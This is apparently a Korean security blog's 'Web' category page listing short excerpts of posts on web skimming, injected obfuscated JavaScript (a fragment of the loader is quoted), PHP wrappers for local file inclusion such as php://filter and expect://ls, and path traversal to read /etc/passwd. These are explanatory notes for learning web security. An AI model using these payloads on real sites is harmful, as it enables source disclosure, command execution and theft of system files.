본문 바로가기
반응형

Web10

Web Skimming https://www.microsoft.com/security/blog/2022/05/23/beneath-the-surface-uncovering-the-shift-in-web-skimming/ Beneath the surface: Uncovering the shift in web skimming - Microsoft Security Blog Web skimming campaigns now employ various obfuscation techniques to deliver and hide the skimming scripts. It’s a shift from earlier tactics where attackers conspicuously injected the malicious scripts int.. 2022. 5. 31.
JS Injection JS 코드 분석을 하다보면, 정상적인 프로젝트 파일인 것 같은데 끝에 아래와 같은 코드가 포함되어 있는 경우가 있다. ;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','n.. 2022. 3. 24.
wrappers LFI 공격할 때, 사용할 수 있는 wrapper들이 있다. 예를 들어, 우리는 서버사이드 언어로 되어있는 php파일들은 눈으로 확인할 수 없다. 이럴때 LFI가 되는 사이트가 있다면, wrapper를 사용하여 소스코드를 확인할 수 있다. WebSiteAddress/?file=php://filter/convert.base64-encode/resource=FileName 위 공격문을 통해 원하는 php파일의 소스코드를 base64로 encode한 내용을 확인할 수 있다. https://www.php.net/manual/en/wrappers.php 다른 예로 expect는 system command를 실행시켜 주는 wrapper다. WebSiteAddress/?file= expect://ls zip:// w.. 2021. 7. 28.
File Download 파일 다운로드 가능한 페이지에서 다운로드 가능한 파일에 대한 검증이 부족할 때, 발생하는 파일 다운로드 취약점 다운로드하는 파일 이름을 변조하여 다른 경로의 파일 다운로드를 통해 공격을 하는 기법이다. 여기서 절대경로로 접근할 경우에 파일 다운로드가 안되는 경우가 가끔 있다. '잉?! /etc/passwd 는 절대경로 맞는데 왜 안나오지?'라는 의문에 빠지지말고, 이렇게 ./upload//etc/passwd 인자가 들어갈 수 있으니 상대경로로 시도해보자 2021. 7. 28.
반응형

티스토리툴바